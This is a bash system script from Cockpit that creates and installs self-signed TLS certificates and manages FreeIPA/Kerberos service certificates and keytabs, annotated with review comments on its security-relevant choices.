Current File : //usr/libexec/cockpit-certificate-helper
#!/bin/bash

# Stop at the first failing command and treat any unset variable as an error.
set -o errexit -o nounset

# prefix= has to be defined because the default /etc contains "${prefix}"
prefix='/usr'
COCKPIT_CONFIG='/etc/cockpit'
COCKPIT_WS_CERTS_D="${COCKPIT_CONFIG}/ws-certs.d"
COCKPIT_RUNTIME_DIR='/run/cockpit'

install_cert() {
    # Move the certificate file named by $1 from the current directory into
    # ${COCKPIT_WS_CERTS_D}, keeping its file name.
    # Arguments: $1 - file name of the certificate (relative to the cwd)
    local cert_name="$1"
    local target="${COCKPIT_WS_CERTS_D}/${cert_name}"

    # -Z asks mv to give the destination the default SELinux context
    mv -Z "${cert_name}" "${target}"

    # Certificates are public data: make the installed file readable by everyone
    chmod a+r "${target}"
}

install_key() {
    # Move the private key file named by $1 from the current directory into
    # ${COCKPIT_WS_CERTS_D}, keeping its file name.
    # Arguments: $1 - file name of the key (relative to the cwd)
    #
    # NOTE(review): unlike install_cert, no chmod follows the move, so the key
    # keeps the mode its generator gave it. Confirm that mode is owner-only.
    local key_name="$1"
    local target="${COCKPIT_WS_CERTS_D}/${key_name}"

    # -Z asks mv to give the destination the default SELinux context
    mv -Z "${key_name}" "${target}"
}

selfsign_sscg() {
    # Create the self-signed certificate, its key and a CA file with sscg.
    # Reads DAYS, KEYFILE, CERTFILE, CA_FILE, HOSTNAME and (optionally)
    # MACHINE_ID from the caller's scope; the organization falls back to
    # "unspecified" when MACHINE_ID is unset or empty.
    # Returns: the exit status of sscg.
    local -a sscg_args=(
        --quiet
        --lifetime "${DAYS}"
        --key-strength 2048
        --cert-key-file "${KEYFILE}"
        --cert-file "${CERTFILE}"
        --ca-file "${CA_FILE}"
        --hostname "${HOSTNAME}"
        --organization "${MACHINE_ID:-unspecified}"
        --subject-alt-name localhost
        --subject-alt-name IP:127.0.0.1/255.255.255.255
    )

    sscg "${sscg_args[@]}"
}

selfsign_openssl() {
    # Create the self-signed certificate and its key with "openssl req -x509".
    # Reads DAYS, KEYFILE, CERTFILE, HOSTNAME and (optionally) MACHINE_ID from
    # the caller's scope; the request configuration is fed on stdin (-config -).
    # Returns: the exit status of openssl.
    #
    # Security-relevant choices visible here:
    #  * -nodes writes the private key to ${KEYFILE} without a passphrase.
    #  * The extensions mark the certificate as a CA (CA:TRUE, keyCertSign)
    #    although it is used with extendedKeyUsage serverAuth, so whoever holds
    #    the key could sign further certificates that chain to it.
    #    NOTE(review): confirm that clients importing this certificate as
    #    trusted are aware of that.
    #  * The subject is assembled from MACHINE_ID and HOSTNAME without
    #    escaping. NOTE(review): presumably a "/" in HOSTNAME would change the
    #    DN layout; verify against the caller.
    local -a req_args=(
        req -x509
        -days "${DAYS}"
        -newkey rsa:2048
        -keyout "${KEYFILE}"
        -keyform PEM
        -nodes
        -out "${CERTFILE}"
        -outform PEM
        -subj "${MACHINE_ID:+/O=${MACHINE_ID}}/CN=${HOSTNAME}"
        -config -
        -extensions v3_req
    )

    openssl "${req_args[@]}" << EOF
    [ req ]
    req_extensions = v3_req
    extensions = v3_req
    distinguished_name = req_distinguished_name
    [ req_distinguished_name ]
    [ v3_req ]
    subjectAltName=IP:127.0.0.1,DNS:localhost
    basicConstraints = critical, CA:TRUE
    keyUsage = critical, digitalSignature,cRLSign,keyCertSign,keyEncipherment,keyAgreement
    extendedKeyUsage = serverAuth
EOF
}

cmd_selfsign() {
    # Generate a self-signed certificate and key in the current directory and
    # install them into ${COCKPIT_WS_CERTS_D}.
    #
    # The upper-case locals keep their names on purpose: selfsign_sscg and
    # selfsign_openssl read them from this function's scope.

    # Organization value: the hex digits of /etc/machine-id; stays unset when
    # that file does not exist.
    local MACHINE_ID
    if [[ -e /etc/machine-id ]]; then
        MACHINE_ID="$(tr -cd '[:xdigit:]' < /etc/machine-id)"
    fi
    local HOSTNAME="${HOSTNAME:-$(hostname)}"

    # Certificates get renewed up to 30 days before they expire, so the
    # lifetime is a year plus 30 days.  The maximum is variously mentioned to
    # be 397 or 398.
    local DAYS=395

    local CERTFILE="0-self-signed.cert"
    local KEYFILE="0-self-signed.key"
    local CA_FILE="0-self-signed-ca.pem"

    # sscg first; openssl only runs when sscg returns non-zero
    selfsign_sscg || selfsign_openssl

    # Install whatever was produced; only sscg creates $CA_FILE
    if [[ -e "${CA_FILE}" ]]; then
        install_cert "${CA_FILE}"
    fi
    install_cert "${CERTFILE}"
    install_key "${KEYFILE}"
}

cmd_ipa_request() {
    # Log in to the realm, make sure the service principal and its keytab
    # entry exist, then request a certificate into ${COCKPIT_WS_CERTS_D}.
    # Arguments: $1 - user name to authenticate as
    # Reads REALM, SERVICE, KEYTAB and HOST from the caller's scope.
    #
    # NOTE(review): USER keeps its name on purpose; a local that shadows an
    # exported variable may itself be exported to the commands below, so
    # renaming it could change what they see. Confirm before renaming.
    local USER="$1"

    # IPA operations require auth; the password comes in on stdin to avoid
    # quoting issues. A failed login is a setup we can't handle, so the script
    # ends with status 0, which means the exit code alone does not tell a
    # caller whether a certificate was requested.
    if ! kinit "${USER}@${REALM}"; then
        exit 0
    fi

    # ipa fails under the C locale, so switch LC_CTYPE in that case
    if [ "$(sh -c 'eval `locale`; echo $LC_CTYPE')" = 'C' ]; then
        export LC_CTYPE=C.UTF-8
    fi

    # Create the kerberos Service Principal Name for cockpit-ws if it is missing.
    # NOTE(review): the two --ok-*-delegate flags look like they mark the new
    # service as trusted for delegation; confirm this deployment needs that.
    if ! ipa service-show "${SERVICE}"; then
        ipa service-add --ok-as-delegate=true --ok-to-auth-as-delegate=true --force "${SERVICE}"
    fi

    # Fetch the cockpit-ws key only when the keytab does not list the service yet
    if ! klist -k "${KEYTAB}" | grep -qF "${SERVICE}"; then
        ipa-getkeytab -p "HTTP/${HOST}" -k "${KEYTAB}"
    fi

    # Request the certificate straight into our certificate directory, so
    # that auto-refresh works
    local cert_path="${COCKPIT_WS_CERTS_D}/10-ipa.cert"
    local key_path="${COCKPIT_WS_CERTS_D}/10-ipa.key"
    ipa-getcert request \
        -f "${cert_path}" \
        -k "${key_path}" \
        -K "HTTP/${HOST}" \
        -m 640 -o root:root -M 644 -w -v
}

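cmd_ipa_cleanup() {
    # Remove what cmd_ipa_request set up: the service's keytab entry, the IPA
    # certificate/key pair, and the ipa-getcert tracking request for them.
    # Reads KEYTAB and SERVICE from the caller's scope.

    # clean up keytab
    if [ -e "${KEYTAB}" ]; then
        ipa-rmkeytab -k "${KEYTAB}" -p "${SERVICE}"
    fi

    # clean up certificate; support both "copy" and "direct" modes from cmd_ipa_request()
    if [ -e "${COCKPIT_WS_CERTS_D}/10-ipa.key" ]; then
        # -f: the guard above only proves that the key exists. Without it a
        # missing certificate makes rm fail, and under "set -e" the script
        # would stop before the tracking request below is cancelled.
        rm -f -- "${COCKPIT_WS_CERTS_D}/10-ipa.cert" "${COCKPIT_WS_CERTS_D}/10-ipa.key"
        ipa-getcert stop-tracking -f "${COCKPIT_WS_CERTS_D}/10-ipa.cert" -k "${COCKPIT_WS_CERTS_D}/10-ipa.key" || \
            ipa-getcert stop-tracking -f /run/cockpit/certificate-helper/10-ipa.cert -k /run/cockpit/certificate-helper/10-ipa.key
    fi
}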

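cmd_ipa() {
    # Handle the "ipa" subcommand.
    # Arguments: $1 - "request" or "cleanup"
    #            $2 - Kerberos realm
    #            $3 - user name (only for "request")
    # Sets REALM, HOST, SERVICE and KEYTAB for cmd_ipa_request/cmd_ipa_cleanup,
    # which read them from this function's scope.
    # Exits 1 on missing arguments, a missing ipa command or an unknown
    # subcommand.
    if [ "$#" -lt 2 ]; then
        echo 'missing arguments'
        exit 1
    fi

    local REALM="$2"

    local HOST
    HOST="$(hostname -f)"
    local SERVICE="HTTP/${HOST}@${REALM}"
    local KEYTAB="${COCKPIT_CONFIG}/krb5.keytab"

    # use a separate Kerberos credential cache (KRB5CCNAME) to avoid
    # interfering with the system one
    # NOTE(review): this is a fixed path and nothing in this function removes
    # it afterwards; confirm the ticket obtained by kinit is cleaned up elsewhere.
    export KRB5CCNAME=/run/cockpit/keytab-setup

    # not an IPA setup? cannot handle this
    # "command -v" is a shell builtin, so the check does not depend on the
    # external "which" program being installed.
    if ! command -v ipa > /dev/null 2>&1; then
        echo 'ipa must be installed for this command'
        exit 1
    fi

    case "$1" in
        request)
            if [ "$#" -lt 3 ]; then
                echo 'missing arguments'
                exit 1
            fi
            cmd_ipa_request "$3"
            ;;
        cleanup)
            cmd_ipa_cleanup
            ;;
        *)
            echo 'unknown subcommand'
            exit 1
            ;;
    esac
}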

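main() {
    # Entry point: check for root, set up a private working directory and
    # dispatch to the requested subcommand.
    # Arguments: $1 - "selfsign" or "ipa"; the remaining arguments are passed
    #            on to cmd_ipa
    # Exits 1 when not run as root or when the subcommand is missing/unknown.

    # ipa-getkeytab needs root to create the file, same for cert installation
    if [ "$(id -u)" != "0" ]; then
        echo 'must be run as root'
        exit 1
    fi

    # Create a private working directory
    mkdir -p "${COCKPIT_RUNTIME_DIR}"
    WORKDIR="${COCKPIT_RUNTIME_DIR}/certificate-helper"
    # No -p here: we expect the directory not to have existed, and mkdir fails
    # if it does, instead of reusing a directory that was created by something
    # else. Mode 700 keeps the freshly generated key material private to root.
    mkdir -m 700 "${WORKDIR}"
    # Turn the listed signals into a normal exit so that the EXIT trap below
    # also removes the working directory when the script is interrupted.
    trap 'exit' INT QUIT PIPE TERM
    trap 'rm -rf "${WORKDIR}"' EXIT
    cd "${WORKDIR}"

    # Dispatch subcommand; "${1:-}" lets a missing subcommand reach the
    # 'unknown subcommand' branch instead of stopping on an unset-variable
    # error under "set -u".
    case "${1:-}" in
        selfsign)
            cmd_selfsign
            ;;
        ipa)
            shift
            cmd_ipa "$@"
            ;;
        *)
            echo 'unknown subcommand'
            exit 1
            ;;
    esac
}

main "$@"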
